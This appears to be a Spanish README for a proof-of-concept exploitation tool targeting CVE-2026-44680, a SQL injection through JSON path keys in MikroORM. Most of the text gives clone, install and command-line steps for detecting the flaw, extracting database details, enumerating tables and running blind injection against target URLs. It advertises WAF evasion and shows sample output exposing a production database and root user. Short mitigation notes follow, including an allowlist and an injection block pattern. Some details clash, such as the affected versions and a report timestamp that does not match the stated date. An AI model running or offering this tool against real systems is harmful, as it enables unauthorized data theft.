
Herramienta PoC para CVE-2026-44680 que afecta a MikroORM ≤7.0.13. Explota la inyección de ruta JSON para extraer el contenido de la base de datos mediante ataques basados en UNION. Ofrece detección de vulnerabilidades, extracción automatizada de datos, enumeración de tablas y soporte para inyección ciega. Incluye integración de proxy para Burp Suite y técnicas de evasión de WAF.
Herramienta Profesional de Prueba de Concepto para Investigadores de Seguridad
CVE-2026-44680 es una vulnerabilidad crítica de inyección SQL que afecta a MikroORM, un popular ORM de TypeScript para Node.js. Este framework de explotación proporciona a investigadores de seguridad y pentesters una herramienta profesional para detectar y explotar la vulnerabilidad.
Autor: Sudeepa Wanigarathna
Versión: 1.0.0
Clasificación: Herramienta Profesional de Investigación de Seguridad
@mikro-orm/knex <= 6.6.13@mikro-orm/sql <= 7.0.13MikroORM no escapa correctamente las claves de ruta JSON controladas en tiempo de ejecución al construir consultas JSON_EXTRACT. Los atacantes pueden salir del contexto de la ruta JSON e inyectar código SQL arbitrario.
# Python 3.8 or higher
python3 --version
# pip package manager
pip --version
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit
# Using requirements.txt
pip install -r requirements.txt
# Or install manually
pip install requests colorama tqdm urllib3 simplejson
python exploit.py --help
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0
# Full exploitation
python exploit.py -u http://localhost:3000
# Vulnerability detection only
python exploit.py -u http://target.com --detect
# Extract database information
python exploit.py -u http://target.com --extract
# Enumerate tables
python exploit.py -u http://target.com --enumerate
python exploit.py -u http://192.168.1.100:3000
python exploit.py -u http://target.com -e /api/v2/users/query
python exploit.py -u http://target.com -p http://127.0.0.1:8080
python exploit.py -u http://target.com -v --extract
python exploit.py -u http://target.com --blind
python exploit.py -u http://target.com --detect
python exploit.py -u http://target.com --extract
python exploit.py -u http://target.com --enumerate
============================================================
MikroORM CVE-2026-44680 Exploitation Framework
Author: Sudeepa Wanigarathna
============================================================
[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection
[+] Vulnerability confirmed!
[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin
===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000
[*] VULNERABILITY DETAILS
- CVE: CVE-2026-44680
- CVSS Score: 7.6 (High)
- Affected Components: @mikro-orm/knex <= 6.6.13
[*] DATABASE INFORMATION
- Version: 10.11.6-MariaDB
- Database: production_db
- User: root@localhost
- Hostname: localhost
[*] ENUMERATED TABLES (5 found)
1. users
2. products
3. orders
4. payments
5. admin
[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt
exploit_report_1742493645.txt # Complete exploitation report
tables_1742493645.txt # List of discovered tables
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];
function validateJsonPath(key) {
if (!ALLOWED_JSON_PATHS.includes(key)) {
throw new Error('Invalid JSON path');
}
return key;
}
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "
IMPORTANTE: Esta herramienta es únicamente para pruebas de seguridad autorizadas y fines educativos.
Este proyecto está licenciado bajo la Licencia MIT.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...
Hecho con ❤️ para la Comunidad de Investigación de Seguridad
Reportar Error • Solicitar Funcionalidad • Añadir Estrella en GitHub
| Atributo | Valor |
|---|
| CVE ID | CVE-2026-44680 |
| Puntuación CVSS | 7.6 (Alta) |
| Vector de Ataque | Red |
| Complejidad de Ataque | Baja |
| Privilegios Requeridos | Bajos |
| Característica | Descripción | Estado |
|---|
| Detección de Vulnerabilidades | Detección basada en tiempo y en errores | ✅ |
| Extracción de Base de Datos | Versión, base de datos, usuario, hostname | ✅ |
| Enumeración de Tablas | Descubrimiento automático de todas las tablas | ✅ |
| Inyección Basada en UNION | Extraer datos mediante UNION SELECT | ✅ |
| Inyección Ciega | Extracción de caracteres basada en booleanos | ✅ |
| Soporte de Proxy | Burp Suite / proxy de intercepción | ✅ |
| Generación de Informes | Informes TXT profesionales | ✅ |
| Evasión de WAF | Técnicas avanzadas de ofuscación | ✅ |
| Flag | Descripción | Por defecto |
|---|
-u, --url | URL objetivo (obligatorio) | - |
-e, --endpoint | Endpoint de API | /api/users/search |
-p, --proxy | Proxy HTTP | Ninguno |
-v, --verbose | Salida verbosa | Falso |
--detect | Detectar solo la vulnerabilidad | Falso |
--extract | Extraer información de la base de datos | Falso |
--enumerate | Enumerar tablas | Falso |
--blind | Modo de inyección ciega | Falso |